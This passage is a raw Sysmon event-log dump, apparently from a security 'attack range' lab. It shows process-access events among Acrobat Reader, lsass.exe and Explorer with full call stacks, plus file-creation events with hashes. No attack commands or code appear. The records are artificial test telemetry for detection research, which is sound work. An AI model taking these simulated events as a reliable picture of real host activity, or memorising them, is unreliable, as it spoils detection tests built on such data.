DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018714Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:06.811{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66DC6A05B755879CB140A7205C438D61,SHA256=258FC1BB9FEA0EB42234040467F14F6680BF43DA5D40610F8D89190C657DC238,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.892{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.892{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.830{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.830{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000046810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.798{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\notificationsDB-journalMD5=EFD7728D79A4C2E166CC01E066A57B2F,SHA256=9386D00C0BA4C601B60DD5FF29190EAD06BBF0C5CCC78523115757F5C928229E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.783{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\notificationsDB-journalMD5=A07E848E788155E1F8D5058F2314F724,SHA256=90A8B62797C1894533E424A4CFBEF68F20E4AC7EC1018D7781502C2EFADAD9C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.705{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000046807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.440{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=939CFB11612AF93BD6D61CA7458B23E1,SHA256=9A683EF625414C6791A4518209D9BCC4CEFCCAAABD94C1B7D3806010FF4CFAA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.440{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\TESTINGMD5=DC84B0D741E5BEAE8070013ADDCC8C28,SHA256=81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.263{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB16CB804AEC223A3E0BB7328444DA91,SHA256=6551107D80EA9DD43585A8836E697DD15CA6C981040676CEB76AD0E69789B7D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.247{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.247{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 